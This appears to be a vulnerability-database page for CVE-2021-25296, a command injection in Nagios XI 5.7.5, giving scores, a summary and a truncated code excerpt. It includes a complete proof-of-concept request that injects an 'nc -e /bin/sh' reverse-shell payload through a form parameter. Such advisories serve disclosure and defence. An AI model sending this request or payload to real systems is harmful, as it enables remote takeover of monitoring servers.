9
CVSSv2

CVE-2021-25296

Published: 15/02/2021 Updated: 18/02/2021
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Nagios XI could allow a remote authenticated malicious user to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. By sending a specially crafted single HTTP request, an attacker could exploit this vulnerability to inject and execute arbitrary commands on the system.

Most Upvoted Vulmon Research Post

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2= payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

nagios nagios xi 5.7.5

Github Repositories

Bugs reported to Nagios XI

nagios-xi-575-bugs Bugs reported to Nagios XI CVE-2021-25296 Code Location /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmiincphp Code snippet if (!empty($plugin_output_len)) { $disk_wmi_command = " --forcetruncateoutput " $plugin_output_len; $service_wmi_command = " --forcetruncateoutput " $plugin_output_len; $proc